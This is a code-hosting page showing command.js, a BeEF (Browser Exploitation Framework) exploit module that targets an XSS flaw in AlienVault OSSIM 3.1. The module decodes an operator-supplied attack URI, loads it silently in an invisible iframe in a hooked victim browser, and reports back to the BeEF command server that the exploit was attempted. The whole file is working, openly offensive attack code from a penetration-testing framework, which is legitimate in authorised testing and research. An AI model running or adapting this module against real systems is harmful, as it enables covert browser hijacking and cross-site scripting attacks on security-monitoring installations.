Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
1154 views
1
//
2
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6
7
beef.execute(function() {
8
9
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
10
11
var alienvault_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
12
alienvault_iframe_<%= @command_id %>.setAttribute('src', uri);
13
14
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
15
16
});
17
18
19